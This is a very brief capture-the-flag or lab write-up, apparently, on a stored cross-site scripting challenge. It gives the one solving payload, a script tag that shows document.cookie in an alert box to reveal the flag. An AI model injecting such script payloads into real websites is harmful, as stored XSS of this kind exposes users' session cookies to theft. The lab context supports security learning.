Stored XSS

To solve this lab we just have to use the following payload:

<script>alert(document.cookie)</script>

And a pop appears with the flag!

Last updated